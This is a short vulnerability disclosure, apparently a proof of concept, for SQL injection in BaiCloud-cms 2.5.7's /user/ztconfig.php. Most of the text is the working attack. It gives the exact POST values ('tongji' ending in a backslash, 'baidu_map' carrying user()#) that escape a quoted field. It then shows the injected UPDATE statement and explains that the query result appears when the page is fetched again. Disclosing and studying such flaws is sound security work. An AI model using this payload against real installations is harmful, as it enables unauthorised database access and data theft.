BaiCloud-cms 2.5.7 /user/ztconfig.php SQL injection Vulnerability
Link Url :
Edition : lastest(2.5.7)
after user login then post data
POST /user/ztconfig.php
then get /user/ztconfig.php page can get result
we set tongji = 1\
and baidu_map=,baidu_map=user()#
then the query is
update zzcms_usersetting set comanestyle='',comanecolor='',swf='',daohang='',bannerbg='',bannerheight='1',mobile='0',tongji='1\',baidu_map=',baidu_map=user()#' where username='admin';
this is a legal sql statement and when get this page,we can get this value.